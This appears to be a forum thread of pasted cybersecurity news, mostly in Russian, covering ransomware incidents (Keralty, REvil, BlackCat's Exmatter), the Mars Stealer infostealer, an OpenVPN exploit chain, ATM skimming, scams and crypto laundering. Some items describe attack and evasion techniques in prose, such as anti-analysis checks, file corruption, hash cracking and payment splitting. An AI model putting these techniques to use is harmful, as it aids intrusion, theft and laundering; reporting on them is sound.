Америке, Испании, США и Азии. В компании работают 24 000 сотрудников, которые
оказывают медицинскую помощь более чем 6 миллионам пациентов.
Во вторник представители Keralty сообщили, что компания и две ее “дочки” (EPS Sanitas и Colsanitas) подверглись кибератаке 27 ноября. Из-за атаки начались перебои в работе IT-систем, появились ошибки в расписаниях для врачей и перестали работать веб-сайты.
По сообщениям местных СМИ, из-за всего происходящего страдают в первую очередь клиенты – люди стоят в очередях по 12 часов и теряют сознание из-за отсутствия медицинской помощи. Компания заявила, что все сотрудники работают по 24 часа в сутки, чтобы как можно скорее восстановить все поврежденные системы и продолжить работу в прежнем режиме. Кроме того, Keralty уже связалась с правоохранительными органами и начала расследование.
Эксперты выяснили, что эта записка принадлежит группировке RansomHouse, а вымогательское ПО называется Mario. Этот вредонос шифрует данные на устройствах под управлением Windows и Linux, добавляет расширение “.mario” к зашифрованным файлам и оставляет записки о выкупе под названием "How To Restore Your Files.txt".
Хакеры из RansomHouse хвастаются, что именно они 27 ноября провели атаку на Keralty и украли 3 ТБ данных. Однако точного подтверждения их громким заявлениям пока что нет.
На русскоязычных хакерских форумах активно рекламируется Windows-троян, облегчающий кражу криптовалюты. Анализ образца Mars Stealer показал, что это усовершенствованная версия инфостилера Oski, свернувшего свои операции полтора года назад.
Последний появился в поле зрения ИБ-экспертов в конце 2019 года. Весной 2020-го Oski засветился в киберкампании, использующей взлом роутеров для перенаправления жертв на вредоносные сайты (путем подмены DNS). В июле того же года создатели зловреда перестали отвечать на запросы потенциальных покупателей и закрыли свой Telegram-канал, удалив аккаунт и бот. Новобранец Mars Stealer, как и Oski, обладает функциями даунлоудера и снабжен кастомным грабером. Он умеет собирать информацию о зараженной системе, а также извлекать сохраненные данные из трех десятков браузеров, почтового клиента Thunderbird и 11 криптокошельков, не считая производные Bitcoin Core. Примечательно, что Outlook в списке целевых программ не значится, а у Oski он присутствовал.
От предшественника и других аналогов Mars Stealer отличают малые размеры
(всего 95 Кбайт), а также повышенный интерес к браузерным плагинам для
двухфакторной аутентификации (четыре 2FA-расширения и менеджер паролей Trezor)
и работы с криптой (почти 40 наименований).

Собранную информацию вредонос отсылает на командный сервер, используя SSL-
соединения. Строки кода Mars Stealer зашифрованы по RC4 и Base64, чтобы
затруднить анализ. С той же целью троян использует функцию Sleep и проверяет
наличие эмулятора Windows Defender. Защитить зловреда от обнаружения помогают
техники сокрытия вызовов API и функция самоудаления (с помощью cmd.exe).
В тех случаях, когда временная характеристика вредоносного файла расходится с
системным временем / датой больше чем на месяц, Mars Stealer завершает свой
процесс. То же происходит, когда выясняется, что жертва по умолчанию
использует язык страны бывшего СНГ (русский, белорусский, казахский,
узбекский, азери).
В настоящее время преемника Oski детектирует подавляющее большинство
антивирусов из коллекции VirusTotal (60 из 69 по состоянию на 2 февраля).
Prominent Apple supplier Quanta on Wednesday said it suffered a ransomware attack from the REvil ransomware group, which is now demanding the iPhone maker pay a ransom of $50 million to prevent leaking sensitive files on the dark web.
In a post shared on its deep web "Happy Blog" portal, the threat actor said it came into possession of schematics of the U.S. company's products such as MacBooks and Apple Watch by infiltrating the network of the Taiwanese manufacturer, claiming it's making a ransom demand to Apple after Quanta expressed no interest in paying to recover the stolen blueprints.
"Our team is negotiating the sale of large quantities of confidential drawings
and gigabytes of personal data with several major brands," the REvil operators
said. "We recommend that Apple buy back the available data by May 1."
Since first detected in June 2019,
REvil (aka
Sodinokibi or Sodin) has emerged as one of the most prolific ransomware-as-a-
service (RaaS) groups, with the gang being the first to adopt the so-called
technique of "double extortion" that has since been emulated by other groups
to maximize their chances of making a profit.
[](https://thehackernews.com/images/-5KgU9YM3mtw/YIAbkLct2hI/AAAAAAAACU4/8f4otRccp-
AeHIbMhviov103ZSGroFhyACLcBGAsYHQ/s0/apple-1.jpg)
[](https://thehackernews.com/images/-_UkW16Xeg-o/YIAbkqFJ7oI/AAAAAAAACU8/GRgCNc5bV7ESoNExQwAn2Cf5HRWc-
dyRACLcBGAsYHQ/s0/apple-2.jpg)
The strategy seeks to pressure victim companies into paying up mainly by
publishing a handful of files stolen from their extortion targets prior to
encrypting them and threatening to release more data unless and until the
ransom demand is met.
The main actor associated with advertising and promoting REvil on Russian- language cybercrime forums is called Unknown, aka UNKN. The ransomware is also operated as an [affiliate service](https://intel471.com/blog/revil-ransomware- as-a-service-an-analysis-of-a-ransomware-affiliate-operation/), wherein threat actors are recruited to spread the malware by breaching corporate network victims, while the core developers take charge of maintaining the malware and payment infrastructure. Affiliates typically receive 60% to 70% of the ransom payment.
Ransomware operators have netted more than $350m in 2020, a 311% jump from the
previous year, [according](https://blog.chainalysis.com/reports/ransomware-
ecosystem-crypto-crime-2021) to blockchain analysis company Chainalysis.
The latest development also marks a new twist in the double extortion game, in
which a ransomware cartel has gone after a victim's customer following an
unsuccessful attempt to negotiate ransom with the primary victim.
We have reached out to Quanta for comment, and we will update the story if we hear back.
However, in a statement shared with [Bloomberg](https://www.bloomberg.com/news/articles/2021-04-21/apple-targeted- in-50-million-ransomware-hack-of-supplier-quanta), the company said it worked with external IT experts in response to "cyber attacks on a small number of Quanta servers," adding "there's no material impact on the company's business operation."
Власти намерены добиться его экстрадиции в Соединенные Штаты, где ему вменяют мошенничество с использованием почты, уклонение от уплаты налогов и подачу ложных деклараций.
Согласно заявлению правоохранителей, Вер предположительно скрыл владение первой криптовалютой от Налоговой службы США (IRS), что повлекло убытки на сумму $48 млн.
В июне 2017 года две компании обвиняемого владели примерно 70 000 BTC, которые он позднее присвоил, скрыв информацию от бухгалтера, и «продал десятки тысяч из них на криптовалютных биржах примерно за $240 млн».
«Несмотря на то, что Вер тогда не был гражданином США, он по-прежнему был по закону обязан отчитываться перед IRS и платить налоги на определенные доходы, включая дивиденды от MemoryDealers и Agilestar, которые являлись американскими корпорациями», — говорится в материалах Минюста.
Предприниматель также пользовался юридическими услугами для подготовки и подачи ложных налоговых деклараций, которые занижали стоимость двух его компаний.
Вер проживал в Санта-Кларе, штат Калифорния, но отказался от гражданства США в 2014 году после того, как получил паспорт Сент-Китс и Невис на Карибах.
sc: justice[.]gov/opa/pr/early-bitcoin-investor-charged-tax-fraud
Сотрудники управления противодействия киберпреступлениям совместно с другими правоохранителями Львовской области разоблачили 37-летнего иностранца в противоправных действиях.
Гражданин Болгарии устанавливал в картридеры банкоматов специальные скимминговые устройства для считывания данных банковских карт пользователей. Также злоумышленник устанавливал скрытые видеокамеры, фиксировавшие ввод PIN- кодов. По предварительным данным, правонарушителю удалось считать информацию с 57 банковских карт граждан.
Обычно такие данные используются для изготовления дубликатов карт и последующего снятия с них наличных денег. Правоохранители проверяют злоумышленника на причастность к мошенническому завладению деньгами.
Сотрудники полиции провели обыск по месту жительства фигуранта дела. Во время обыска была изъята компьютерная техника, где хранились сведения о банковских картах граждан, скимминговое оборудование и металлические накладки с видеокамерами.
Мужчине объявленное подозрение по ч. 5 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины. За совершённые правонарушения ему грозит до 15 лет лишения свободы. Продолжаются следственные действия.
Дополнительно киберполиция напоминает, что перед использованием банкомата нужно его тщательно осмотреть, а при вводе PIN-кода следует прикрывать клавиатуру рукой.
source: cyberpolice.gov.ua/news/na-lvivshhyni-kiberpoliczejski-vykryly- inozemczya-u-skimingu-257
В Олдсмаре, штат Флорида, удалось предотвратить попытку неизвестного хакера повысить уровень щелочи в городской системе очистки воды, что угрожало отравлением тысячам людей. Как сообщает CNN со ссылкой на шерифа округа Пинеллас Боба Гуалтьери, хакер получил удаленный доступ к системе и увеличил уровень гидроксида натрия в воде более чем в 100 раз.
Оператор системы зафиксировал вмешательство, и ему удалось снизить уровень щелочи в воде до безопасного уровня. По словам Гуалтьери, это первый подобный случай в округе: имела ли место атака на местном, национальном уровне или исходила от источника за пределами США, пока неизвестно.
Как заявил генеральный директор компании по промышленной кибербезопасности Dragos Inc Роберт Ли, вмешательство оператора позволило избежать серьезных последствий атаки, однако именно такой тип атак является самым опасным. На то, чтобы отравленная вода достигла системы, потребовалось бы от 24 до 36 часов. Городские власти предприняли шаги для предотвращения дальнейшего доступа к системе. К расследованию инцидента привлечены работники ФБР и спецслужб.
Сенатор от Флориды Марко Рубио предложил рассматривать взлом системы очистки воды как вопрос национальной безопасности. Гидроксид натрия, также известный как щелочь, является основным ингредиентом жидкого очистителя канализации. Симптомы отравления им включают затрудненное дыхание, воспаление легких, отек горла, жжение в пищеводе и желудке, сильную боль в животе, потерю зрения и низкое кровяное давление. Повреждение пищевода и желудка может продолжаться в течение нескольких недель после отравления, а смерть может наступить спустя месяц.
Пасты не будет, ссылки ниже
https://www.securitylab.ru/news/535058.php
[ https://koolplaz.com/google-exposes-heliconia-exploit-framework-targeting- chrome-firefox-windows/ ](https://koolplaz.com/google-exposes-heliconia- exploit-framework-targeting-chrome-firefox-windows/)

](https://blog.google/threat-analysis-group/new-details-on-commercial-spyware- vendor-variston/)
The Threat Analysis Group shares new information on the commercial spyware vendor Variston.
blog.google
З.ы.
В очередной раз говорю что хром не дружит с обновлениями. На днях думал
попросить кого нибудь чтоб выгрузили стату с дтски по версиями хрома...
Хакер модифицировал данные, составляющие государственную тайну.
Сотрудники правоохранительных органов задержали в Москве Олега Русаковича по подозрению во взломе Единой информационной системы Федеральной таможенной службы, передает Telegram-канал Mash. Предполагается, что он помогал проходить таможню «нужным товарам».
С 2018-го по 2021 год Русакович менял и похищал данные, представляющие собой государственную тайну. Предполагается, что «хакер» вступил в сговор с неустановленными лицами, после чего воспользовался чужим аккаунтом, чтобы взломать ЕИС ФТС.
За атаку на критическую инфраструктуру России мужчина был задержан и помещен под домашний арест. Известно, что на него оформлено около десяти автомобилей, а также несколько квартир в Москве.
source: t.me/breakingmash/35795
Ущерб по уголовному делу задержанных по запросу США предполагаемых хакеров группировки REvil пока не установлен, защите неизвестно, кого следствие считает потерпевшим по делу, сообщил "Интерфаксу" адвокат Евгений Крылов в среду.
"Мы будем обязательно обжаловать арест в кассации, его причастность вообще не доказана - никаких доводов. Обвинение нам было предъявлено в день избрания меры пресечения, в обвинении нам предъявлен один эпизод. Мы даже не знаем, кто потерпевший по этому делу, ущерб тоже пока не установлен, однако роли между обвиняемыми распределены, но там нет пока организатора", - сказал Крылов.
Он отметил, что запрос США в материалах об аресте, с которыми ознакомили защиту, также отсутствовал.
Крылов рассказал, что "наш подзащитный (Дмитрий Коротаев - ИФ) нигде в справках ОРМ не фигурировал, то есть Коротаев здесь - "случайный пассажир", он просто оказался не в то время и не в том месте, его задержали не дома, а в гостях у кого-то из фигурантов дела и его прихватили просто", - сказал адвокат.
Ранее в среду сообщалось, что Мосгорсуд оставил под арестом одного из фигурантов дела "хакеров REvil" - Дмитрия Коротаева и отказал защите смягчить ему меру пресечения. В ходе заседания защита настаивала на чрезмерности избранной меры, также адвокаты и сам обвиняемый выразили готовность сотрудничать со следствием.
Представитель гособвинения сообщил в суде, что следствие продолжает устанавливать все обстоятельства дела.
В ФСБ РФ 14 января 2022 года сообщили о задержании по запросу США ряда участников группировки REvil в Москве, Санкт-Петербурге, Московской, Ленинградской и Липецкой областях.
Задержанным фигурантам было предъявлено обвинение в неправомерном обороте средств платежей (ч. 2 ст. 187 УК РФ). Тверской суд Москвы 14 и 15 января по ходатайству следствия заключил под стражу восьмерых обвиняемых: Артема Заеца, Даниила Пузыревского, Алексея Малоземова, Дмитрия Коротаева, Руслана Хансвярова, Михаила Головчука, Романа Муромского и Андрея Бессонова.
Обыски, как сообщили в ФСБ, прошли в домах 14 участников группы, у которых были изъяты свыше 426 млн руб., в том числе в криптовалюте, $600 тыс., 500 тыс. евро, а также компьютерная техника, криптокошельки и 20 автомобилей премиум-класса.
Как пояснили в ФСБ, основанием для разыскных и следственных мероприятий послужило обращение компетентных органов США, сообщивших о лидере преступного сообщества и его причастности к посягательствам на информационные ресурсы зарубежных высокотехнологичных компаний путем внедрения вредоносного программного обеспечения, шифрования информации и вымогательства денежных средств за ее дешифрование.
По версии ФСБ, задержанные разработали вредоносное программное обеспечение, организовали хищение денежных средств с банковских счетов иностранных граждан и их обналичивание, в том числе путем приобретения дорогостоящих товаров в интернете.
Как сообщил "Интерфаксу" информированный источник, некоторые фигуранты уголовного дела о хакерской группировке REvil попали в поле зрения российских спецслужб еще в 2017 году.
В июле 2021 года базирующаяся в США компания Kaseya подверглась масштабной кибератаке с применением вируса-вымогателя. Хакерская атака затронула компании, прямо или косвенно связанные с Kaseya, которая занимается удаленным контролем за программами своих клиентов - поставщиков интернет-услуг для бизнеса. Сообщалось, что кибератаку совершила хакерская группировка REvil, которой приписывали связи с РФ.
В ноябре генпрокурор США Меррик Гарланд заявил, что россиянин Евгений Полянин, который считается одним из лидеров REvil, получил порядка $13 млн от жертв его хакерских атак с применением программ-вымогателей, но $6,1 млн из них Вашингтону удалось вернуть.
Украинка познакомилась в социальной сети Instagram с представительным мужчиной, который представился генералом вооруженных сил США. Между ними завязалось общение, которое обещало привести к дальнейшему развитию отношений.
Генерал объяснил новоиспеченной даме сердца, что, по долгу службы, находится в Сирии, но в скором времени приедет к ней в Украину. Однако из-за сложностей, связанных с прохождением границы, ему будет затруднительно провезти с собой крупную суму денег и некоторые личные документы.
Генерал сказал, что отправит эти вещи в Украину по почте и попросил женщину получить для него посылку. А в качестве благодарности, он пообещал положить в посылку подарок - ювелирные украшения. Женщина согласилась, и американец прислал номер транспортной накладной для отслеживания посылки, которую отправил курьерской службой «Zenith Global Logistics».
По прошествии некоторого времени, украинской невесте позвонила неизвестная, представившаяся диспетчером аэропорта Борисполь, которая сообщила, что посылка прибыла в Украину. А после этого женщина получила электронное письмо от дипоматической доставки о том, что для получения посылки нераспакованной, необходимо оплатить таможенный сбор, а также различные другие виды сборов, общей стоимостью более 200 тысяч гривен. Для оплаты были указаны реквизиты, оказавшиеся номерами банковских карт.
Забеспокоившись, украинка обратилась к своему американскому жениху и объяснила ситуацию. Но тот заверил, что ситуация абсолютно нормальная, и стал упрашивать обязательно получить посылку с важными документами и деньгами. Генерал пообещал, что обязательно компенсирует все расходы по приезде в Украину. Поверив, женщина исхитрилась собрать необходимую сумму и оплатила все расходы.
Однако посылка так и не пришла. Женщина попыталась связаться с людьми, решавшими с ней вопросы оплаты посылки, но их телефоны не отвечали. Проверить судьбу посылки через сайт курьерской службы также не удалось, поскольку он больше не работал. Более того, его адрес (zenitglobal.net) оказался фейком, который всего на 1 букву отличался от официального адреса zenithglobal.com. Сам же «генерал» также оказался фальшивкой – его фотографии были позаимствованы неизвестными с анкет сайтов знакомств.
В рамках возбужденного, по факту мошенничества, уголовного дела (№12019120020009385 ЕРДР), правоохранители выяснили, что на банковские карты, куда потерпевшая перечисляла деньги, поступало большое количество и других платежей, исчислявшихся десятками и сотнями тысяч гривен. И по некоторым из них также открыты уголовные производства.
В ходе обысков, проведенных у владельцев мошеннических счетов, полицейские обнаружили большое количество банковских карт подставных лиц (дропов). Один из задержанных правоохранителями дропов признался, что открыл карту по просьбе подозреваемого, афроамериканской внешности, для которого получал и обналичивал деньги за комиссионное вознаграждение.
Записи камер наблюдения банкоматов подтвердили, что полученные мошенническим путем деньги снимал чернокожий мужчина. В настоящий момент правоохранители пытаются выяснить личность подозреваемого.
Следствие продолжается.
Скорость шифрования файлов вымогательским ПО имеет большое значение для команд
реагирования на угрозы.
Исследователи компании Splunk провели эксперимент, в ходе которого протестировали десять вымогательских программ с целью установить, как они шифруют файлы, и как быстро нужно реагировать на их атаки.
Программа-вымогатель – вредоносное ПО, которое перечисляет файлы и каталоги на скомпрометированной машине, выбирает подходящие для шифрования, а затем шифрует, из-за чего они становятся недоступными без соответствующего ключа дешифрования.
Скорость шифрования файлов вымогательским ПО имеет большое значение для команд реагирования на угрозы. Чем быстрее его удастся обнаружить, тем меньший ущерб оно причинит, и подлежащих восстановлению данных будет меньше.
Исследователи Splunk провели 400 тестов с использованием десяти различных вымогательских семейств, по десять программ в каждом семействе, на четырех различных хостах Windows 10 и Windows Server 2019 с разной производительностью.
В ходе тестирований специалисты определили скорость шифрования 98 561 файла общим объемом 53 ГБ с помощью различных инструментов, таких как Windows logging, Windows Perfmon statistics, Microsoft Sysmon, Zeek и stoQ.
Общее среднее время для всех ста программ-вымогателей на тестовых установках составило 42 минуты 52 секунды. Однако, как показано в представленной ниже таблице, некоторые образцы значительно отклонялись от этого медианного значения.
Самым быстрым о опасным оказалось семейство вымогателей LockBit, которому удалось зашифровать все файлы в среднем всего за 5 минут 50 секунд. Самый быстрый представитель семейства шифровал файлы со скоростью 25 тыс. в минуту.
Ранее популярное вымогательское ПО Avaddon зашифровало файлы за 13 минут,
REvil – за 24 минуты, а BlackMatter и Darkside – за 45 минут. А вот нашумевший
вымогатель Conti явно отстает от них – на шифрование 53 ГБ данных у него ушел
почти час. Среди отстающих также оказались Maze и PYSA, которым потребовалось
целых два часа.
Подробнее:
https://www.securitylab.ru/news/530765.php
Мошенники убедили его, что у него проблемы с пенсией.
79-летний Юрий Иванович Яровенко служил с 70-х и к концу 80-х дослужился до начальника 3-го отдела 3-го Главного управления КГБ СССР (там занимались внутренней безопасностью и контрразведкой). По данным «Базы», мошенники связались с генералом 20 августа. Представляясь коллегами из ФСБ и сотрудниками Пенсионного фонда, преступники смогли убедить Яровенко, что его пенсию надо бы пересчитать.
Юрий Иванович три раза встречался с курьерами-инкассаторами, которым он передавал пакеты со своими сбережениями. Всего генерал передал им 60 миллионов рублей. Осознание пришло к Яровенко лишь к началу сентября — он понял, что имел дело с мошенниками, и пошёл в полицию. Возбуждено дело о мошенничестве в особо крупном размере.
Denis Dubnikov was sentenced to time served and a $2,000 forfeiture.
Denis Dubnikov, a founder of two over-the-counter (OTC) trading desks in
Russia tied to ransomware attacks, was sentenced to no jail time and
forfeiture of $2,000 last week after a guilty plea, court documents show.
Dubnikov is a founder of the [Coyote Crypto and
Eggchange](https://www.documentcloud.org/documents/23601319-denis-mihaqlovic-
dubnikov-second-superseding-indictment-govuscourtsord1536201030) OTC services
in Russia. He was arrested in 2021 in the Netherlands and
[extradited](https://www.coindesk.com/business/2022/08/18/us-extradites-
alleged-crypto-money-launderer-from-netherlands/) to the US in 2022 for
helping ransomware hackers cash out crypto. According to the US Department of
Justice, Dubnikov helped the notorious Ryuk ransomware group launder more than
$400,000 in ransom proceeds.
According to an [indictment](https://www.documentcloud.org/documents/23601319-denis- mihaqlovic-dubnikov-second-superseding-indictment-govuscourtsord1536201030), Dubnikov was among the brokers who helped Ryuk launder the ransomware payouts by splitting payments into multiple smaller amounts, transferring them between self-hosted wallets and then exchanging bitcoin (BTC) for tether (USDT), other cryptocurrencies and fiat, especially the Chinese yuan.
Полиция Китая арестовала членов группировки Chicken Drumstick, занимающейся производством и продажей читов для видеоигр, включая Call of Duty, Valorant и Overwatch. Об этом сообщило издание BBC.
Согласно заявлению правоохранительных органов, это крупнейшая подобная организация. В городе Куньшань задержаны десять человек, связанных с этой преступной группировкой, которые обслуживали 17 площадок по распространению читов.
Стоимость их услуг варьировалась от $10 за сутки использования программ до $200 за месяц. Суммарный доход группировки составил $76 млн (₽5,7 млрд). Кроме того, полиция изъяла у преступников имущество на сумму $46 млн, в том числе несколько спорткаров Ferrari 488, Lamborghini Huracan, Mercedes G-Class, BMW, McLaren и другие.
Подобная деятельность наносит сильный урон индустрии видеоигр. Tencent — одна из крупнейших игровых компаний в Китае, которая страдает от читеров. Ещё в 2019 году опрос показал, что около трети игроков используют читы. Несколько известных на весь мир игроков ушли из популярных игр из-за увеличения читерства. Так было с Викрамом Сингхом Барном (Vikram Singh Barn), известным под ником Vikkstar. У него более семи миллионов подписчиков на YouTube. Однако он прекратил играть в Warzone, заявив, что игра находится «в худшем состоянии за всё время» из-за хакеров.
Один из наиболее распространенных читов — это использование так называемого «прицельного бота», системы, которая позволяет более точно стрелять по соперникам без необходимости прицеливания вручную. Другой популярный трюк — «wallhack», который позволяет пользователю видеть местоположение других игроков в игре и атаковать их через непрозрачные стены. Другие читы позволяют пользователям исцелять себя бесконечное количество раз.
Project Zero, Google's zero-day bug-hunting team, discovered a group of hackers that used 11 zero-days in attacks targeting Windows, iOS, and Android users within a single year.
The Project Zero team revealed that the hacking group behind these attacks ran
two separate campaigns, in February and October 2020.
This month's report showcases the use of seven zero-days after a previous one
published in January
showed how four zero-days were used together with n-day exploits to hack
potential targets.
Just as before, the attackers used a couple of dozen websites hosting two exploit servers, each of them targeting iOS and Windows or Android users.
"In our testing, both of the exploit servers existed on all of the discovered domains," Project Zero team member Maddie Stone [said](https://googleprojectzero.blogspot.com/2021/03/in-wild-series- october-2020-0-day.html).
"After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers."
Attack flow (Project
Zero)
All in all, while analyzing the October 2020 campaign, the Project Zero
researchers found:
"When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year," Stone added.
The 11 zero-days used to build the exploit chains during last year attacks include:
Each of the discovered exploits revealed an expert understanding of the vulnerability being exploited and exploit development.
Additionally, in the case of the Chrome Freetype zero-day, the exploitation method used by this hacking group was new to Project Zero.
"Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting, and maturity of this actor's operation set these apart," Project Zero added.
"The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out."
RaaS-модель может исчезнуть, а хакеры будут просто уничтожать файлы.
Группировка BlackCat обновила свое ПО для кражи данных Exmatter и добавила новую функцию повреждения данных, кардинально изменив тактику атак аффилированных лиц.
Новый образец был обнаружен аналитиками из ИБ-компании Cyderes , а затем передан группе исследования угроз Stairwell для дальнейшего анализа. Exmatter используется аффилированными лицами BlackMatter как минимум с октября 2021 года, но это первый раз, когда Exmatter был замечен с модулем уничтожения данных.
Эксперты из Cyderes заявили, что по мере того, как файлы загружаются на сервер злоумышленника, они ставятся в очередь для обработки классом Eraser. Сегмент произвольного размера, начинающийся в начале второго файла, считывается в буфер, а затем записывается в начало первого файла, перезаписывая его и повреждая файл.
Эта тактика использования данных из одного извлеченного файла для повреждения
другого файла может быть попыткой уклониться от обнаружения или эвристического
анализа.
Как обнаружили исследователи угроз Stairwell, возможности уничтожения данных
Exmatter все еще находятся в разработке, учитывая следующее:
У Exmatter не существует механизма для удаления файлов из очереди, то есть
некоторые файлы могут быть перезаписаны много раз, прежде чем программа
завершит работу, а другие, возможно, никогда не будут выбраны для обработки;
Функция, которая создает экземпляр класса «Erase», реализована не полностью и
декомпилируется неправильно. Длина фрагмента второго файла, который
используется для перезаписи первого файла, определяется случайным образом и
может составлять всего один байт.

Повреждение данных Exmatter
Исследователи считают, что новая функция повреждения данных может заменить традиционные атаки программ-вымогателей, когда данные крадут, а затем шифруют, на атаки, при которых данные крадут, а затем удаляют или повреждают. Этот метод, в отличие от RaaS-модели, позволяет хакеру забрать себе весь доход, полученный от атаки, поскольку ему не нужно делиться процентом с разработчиком шифровальщика.
При обычном шифровании у злоумышленников есть риск того, что жертва найдет способ расшифровки данных и не заплатит выкуп. Уничтожение конфиденциальных данных после их эксфильтрации на сервер хакера предотвратит это и послужит дополнительным стимулом для жертв платить выкуп, а также отсутствие этапа шифрования ускоряет процесс атаки.
Эти факторы приводят к тому, что аффилированные лица отказываются от RaaS- модели в пользу программ-вымогателей, которые просто уничтожают данные.
source:
cyderes.com/blog/threat-advisory-exmatter-data-extortion
stairwell.com/news/threat-research-report-exmatter-future-of-data-extortion
Прокуратура южного округа Нью-Йорка предъявила дополнительные обвинения 47-летнему гражданину Канады Джеймсу Эллингсону (James Ellingson), который уже находится под следствием по обвинению в связях с площадкой Silk Road. Помимо мошенничества, ему теперь вменяют продажу и контрабанду наркотиков, а также отмывание денег.
В частности, утверждается, что Эллингсон, который на Silk Road пользовался аккаунтами redandwhite, MarijuanaIsMyMuse и Lucydrop, продал в совокупности более четырех килограммов метамфетамина, 100 граммов героина, более двух килограммов кокаина, более шести граммов ЛСД, около семи килограммов экстази и МДМА, а также около 19 килограммов марихуаны.
«Эллингсон использовал даркнет для доставки опасных наркотиков по всему миру, в том числе в Нью-Йорк. Те, кто попытается спрятаться в теневом сегменте интернета, должны знать, что федеральные правоохранительные органы будут продолжать раскрывать преступления, где бы и как бы они ни совершались», — прокомментировал новые обвинения прокурор США Дамиан Уильямс (Damian Williams).
При этом только по статье о незаконном ввозе наркотиков на территорию Соединенных Штатов Эллингсон может получить пожизненное заключение. Другие статьи также подразумевают достаточно серьезные сроки.
Издание The Record напоминает, что канадец получил широкую известность, после того, как ему удалось заскамить основателя Silk Road Росса Ульбрихта (Ross Ulbricht). Сначала он написал ему с одного аккаунта, якобы рассказав, что его пытаются деанонимизировать. Затем уже с другого аккаунта он предложил за деньги устранить людей, стремящихся узнать, кто является администратором Silk Road. Получив за фейковое убийство 150 тысяч долларов, он провернул схему еще раз, утверждая, что теперь потребуется устранение еще четырех граждан Канады. Во второй раз Ульбрихт заплатил еще 500 тысяч долларов.
Эллингсон не понаслышке знаком с североамериканской системой правосудия. За ним тянется длинный шлейф преступлений, в основном связанных с незаконным оборотом наркотиков. Суммарно к 47 годам канадец набрал десять судимостей, некоторые из которых были условными, либо относились к нарушениям условий досрочного освобождения.
source: justice[.]gov/usao-sdny/pr/silk-road-drug-vendor-who-claimed-commit- murders-hire-silk-road-founder-ross-ulbricht
The world of cryptocurrency has been shaken once again with news of the Platypus DeFi-protocol hack. The decentralized finance platform, which operates on the blockchain network, was breached, resulting in the loss of $8.5 million worth of cryptocurrency. To make matters worse, another cryptocurrency, USP, has lost its peg to the dollar, further undermining the stability and reliability of digital currencies.
The Platypus DeFi-protocol is one of the newer platforms in the world of decentralized finance. It operates on the Ethereum blockchain and offers various services, including yield farming, staking, and lending. Like other DeFi protocols, it relies on smart contracts to automate transactions, which are supposed to be secure and immutable.
Unfortunately, this was not the case for Platypus, as the platform was hacked, and attackers were able to exploit a vulnerability in the smart contract. The hackers were able to drain the platform’s liquidity pool and steal $8.5 million worth of various [cryptocurrencies](https://zugtimes.com/what-are- cryptos-or-cryptocurrencies/). The attack was a huge blow to the platform and its users, who lost their funds.
The hack has once again raised questions about the security and reliability of DeFi platforms, which have become increasingly popular in recent years. The decentralized nature of these platforms is supposed to make them more secure, but as the Platypus hack shows, they are not immune to attacks.
The incident highlights the importance of conducting regular security audits and implementing robust security protocols. It also underscores the need for the DeFi industry to work with regulators to create a more transparent and stable market.
Another cryptocurrency that has suffered a setback is USP, a stablecoin pegged to the US dollar. Stablecoins are designed to maintain a stable value, with each token being backed by a reserve of US dollars. However, USP has lost its peg to the dollar, meaning that its value has dropped significantly, causing concern among investors and users.
The loss of USP’s peg is a reminder of the risks associated with digital currencies, which can be volatile and subject to sudden drops in value. It also highlights the need for more transparency and regulation in the cryptocurrency market, to ensure that users are protected from fraud and market manipulation.
Addressing Cryptocurrency Security Concerns In conclusion, the Platypus DeFi- protocol hack and the loss of USP’s peg are two significant events that have once again brought the issue of cryptocurrency security to the forefront. While the potential of DeFi and cryptocurrencies is undeniable, it is crucial that the industry takes steps to address security concerns and ensure that users are protected. This includes implementing robust security protocols, conducting regular audits, and working with regulators to create a more transparent and stable market. Only then can the world of cryptocurrency achieve its full potential and gain wider adoption.
Source: [Zugtimes](https://zugtimes.com/crypto-chaos-platypus-defi-protocol- hacked/)
На конференции Black Hat USA 2024 представители Microsoft [рассказали](https://www.microsoft.com/en-us/security/blog/2024/08/08/chained- for-attack-openvpn-vulnerabilities-discovered-leading-to-rce-and-lpe/) сразу о [четырех уязвимостях](https://forums- new.openvpn.net/forum/announcements/69-release-openvpn-version-2-6-10) в OpenVPN. Проблемы можно объединить в цепочку, что позволит добиться удаленного выполнения кода (RCE) и локального повышения привилегий (LPE).
«Эта атака может позволить злоумышленникам получить полный контроль над целевыми эндпоинтами, что потенциально может привести к утечке данных, компрометации системы и несанкционированному доступу к конфиденциальной информации», — рассказывает Владимир Токарев из Microsoft Threat Intelligence Community.
Click to expand...
При этом отмечается, что эксплоит, представленный на конференции, требует аутентификации и глубокого понимания внутренних механизмов работы OpenVPN.
Перечисленные ниже уязвимости затрагивают все версии OpenVPN вплоть до 2.6.10 и 2.5.10, где они были устранены.
Первые три проблемы связаны с компонентом openvpnserv, а последняя — с драйвером Windows Terminal Access Point (TAP).

Все уязвимости можно использовать сразу после того, как злоумышленник получил доступ к учетным данным OpenVPN. Отмечается, что сделать это можно различными способами, включая покупку данных в даркнете, использование инфостилеров и другой малвари, сниффинг сетевого трафика для получения хешей NTLMv2 (и их последующего декодирования с помощью таких инструментов, как HashCat или John the Ripper).
«Злоумышленник может использовать как минимум три из четырех обнаруженных уязвимостей для создания эксплоитов, способствующих RCE и LPE, которые затем могут быть соединены вместе для создания мощной цепочки атак», — отметил Токарев, добавив, что после повышения привилегий атакующие могут перейти к таким техникам, как Bring Your Own Vulnerable Driver (BYOVD). — Таким образом злоумышленник сможет, например, отключить Protect Process Light (PPL) для критически важного процесса, такого как Microsoft Defender, а также обойти или вмешаться в работу других критически важных процессов в системе».
Click to expand...
На теневом форуме DarkMoney форсится новая схема скама пользователей. Об этом предупреждает старший арбитр Берия. По его словам схема связана с попытками сыграть на доверии потенциальных жертв к гаранту Offelia.
"Кидала заключает с вами сделку, оформляет анкету в гаранте Offelia. Также кидала заключает с вами сделку, не оформляя анкету в гаранте, а просто пересылая и имитируя сообщения от Offelia. После чего имитирует сообщения от гаранта в виде пересланного сообщения с кошельком на оплату и комиссией, тем самым вставляя свой кошелек для оплаты", — написал Товарищ Берия.
Он добавил, что явление уже носит массовый характер. По данным Берии, каждый день "заключаются десятки фейковых сделок". В связи с этим он призвал пользователей быть внимательными и лично уточнять у гаранта все детали.
